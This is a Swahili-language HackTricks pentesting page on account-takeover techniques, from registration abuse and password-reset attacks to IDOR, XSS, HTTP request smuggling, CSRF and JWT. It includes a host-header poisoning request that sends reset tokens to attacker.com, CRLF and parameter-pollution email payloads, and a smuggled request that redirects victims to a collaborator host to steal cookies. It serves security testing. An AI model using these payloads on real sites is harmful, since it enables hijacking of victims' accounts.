Usajili & Ukatili wa Akaunti

Reading time: 7 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Ukatili wa Usajili

Usajili wa Nakala

  • Jaribu kuunda kwa kutumia jina la mtumiaji lililopo
  • Angalia kubadilisha barua pepe:
  • herufi kubwa
  • +1@
  • ongeza nukta katika barua pepe
  • wahusika maalum katika jina la barua pepe (%00, %09, %20)
  • Weka wahusika weusi baada ya barua pepe: test@test.com a
  • victim@gmail.com@attacker.com
  • victim@attacker.com@gmail.com

Uainishaji wa Jina la Mtumiaji

Angalia kama unaweza kubaini wakati jina la mtumiaji tayari limeregisteriwa ndani ya programu.

Sera ya Nywila

Unapounda mtumiaji angalia sera ya nywila (angalia kama unaweza kutumia nywila dhaifu).
Katika hali hiyo unaweza kujaribu kubruteforce akidi.

SQL Injection

Angalia ukurasa huu kujifunza jinsi ya kujaribu ukatili wa akaunti au kutoa taarifa kupitia SQL Injections katika fomu za usajili.

Oauth Takeovers

OAuth to Account takeover

Uhalifu wa SAML

SAML Attacks

Badilisha Barua Pepe

Unapokuwa umesajiliwa jaribu kubadilisha barua pepe na angalia kama mabadiliko haya yanathibitishwa ipasavyo au unaweza kuyabadilisha kuwa barua pepe zisizo za kawaida.

Ukaguzi Zaidi

  • Angalia kama unaweza kutumia barua pepe za muda
  • Nywila Ndefu (>200) inasababisha DoS
  • Angalia mipaka ya viwango kwenye uundaji wa akaunti
  • Tumia username@burp_collab.net na uchambue callback

Ukatili wa Kurejesha Nywila

Kuvuja kwa Tokeni ya Kurejesha Nywila Kupitia Referrer

  1. Omba kurejesha nywila kwa anwani yako ya barua pepe
  2. Bonyeza kwenye kiungo cha kurejesha nywila
  3. Usibadilishe nywila
  4. Bonyeza tovuti zozote za upande wa tatu (mfano: Facebook, twitter)
  5. Kamatia ombi katika Burp Suite proxy
  6. Angalia kama kichwa cha referer kinavuja tokeni ya kurejesha nywila.

Ukatili wa Kurejesha Nywila kwa Kutoa Taka

  1. Kamatia ombi la kurejesha nywila katika Burp Suite
  2. Ongeza au hariri vichwa vifuatavyo katika Burp Suite: Host: attacker.com, X-Forwarded-Host: attacker.com
  3. Peleka ombi na kichwa kilichobadilishwa
    http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
  4. Tafuta URL ya kurejesha nywila kulingana na kichwa cha host kama: https://attacker.com/reset-password.php?token=TOKEN

Kurejesha Nywila Kupitia Paramenta ya Barua Pepe

bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

  1. Mshambuliaji lazima aingie kwenye akaunti yao na aende kwenye kipengele cha Badilisha nenosiri.
  2. Anza Burp Suite na uingilie ombi
  3. Tuma kwenye tab ya repeater na uhariri vigezo: User ID/email
    powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

Token ya kubadilisha nenosiri inapaswa kuundwa kwa nasibu na kuwa ya kipekee kila wakati.
Jaribu kubaini kama token inakoma au ikiwa kila wakati ni ile ile, katika baadhi ya matukio algorithimu ya uzalishaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithimu.

  • Timestamp
  • UserID
  • Barua pepe ya Mtumiaji
  • Jina la Kwanza na Jina la Mwisho
  • Tarehe ya Kuzaliwa
  • Cryptography
  • Nambari pekee
  • Mfuatano mdogo wa token (herufi kati ya [A-Z,a-z,0-9])
  • Tumia tena token
  • Tarehe ya kumalizika kwa token

Leaking Password Reset Token

  1. Trigger ombi la kubadilisha nenosiri kwa kutumia API/UI kwa barua pepe maalum e.g: test@mail.com
  2. Kagua jibu la seva na angalia resetToken
  3. Kisha tumia token hiyo katika URL kama https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

  1. Jisajili kwenye mfumo kwa jina la mtumiaji linalofanana na jina la mtumiaji wa mwathirika, lakini ukiweka nafasi za wazi kabla na/au baada ya jina la mtumiaji. e.g: "admin "
  2. Omba kubadilisha nenosiri kwa kutumia jina lako la mtumiaji la uhalifu.
  3. Tumia token iliyotumwa kwa barua pepe yako na ubadilishe nenosiri la mwathirika.
  4. Unganisha kwenye akaunti ya mwathirika kwa nenosiri jipya.

Jukwaa la CTFd lilikuwa na udhaifu kwa shambulio hili.
Tazama: CVE-2020-7245

Account Takeover Via Cross Site Scripting

  1. Tafuta XSS ndani ya programu au subdomain ikiwa vidakuzi vimewekwa kwenye kikoa cha mzazi: *.domain.com
  2. Leak vidakuzi vya sasa vya sessions
  3. Thibitisha kama mtumiaji kwa kutumia cookie

Account Takeover Via HTTP Request Smuggling

1. Tumia smuggler kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Tengeneza ombi ambalo litabadilisha POST / HTTP/1.1 na data ifuatayo:
GET http://something.burpcollaborator.net HTTP/1.1 X: kwa lengo la kufungua redirect wa wahanga kwenda burpcollab na kuiba vidakuzi vyao
3. Ombi la mwisho linaweza kuonekana kama ifuatavyo

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone inaripoti kutumia hitilafu hii
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666

Kuchukua Akaunti kupitia CSRF

  1. Tengeneza payload kwa CSRF, e.g: “Fomu ya HTML yenye kuwasilisha kiotomatiki kwa mabadiliko ya nenosiri”
  2. Tuma payload

Kuchukua Akaunti kupitia JWT

JSON Web Token inaweza kutumika kuthibitisha mtumiaji.

  • Hariri JWT kwa ID ya Mtumiaji / Barua pepe nyingine
  • Angalia saini dhaifu ya JWT

JWT Vulnerabilities (Json Web Tokens)

Marejeleo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks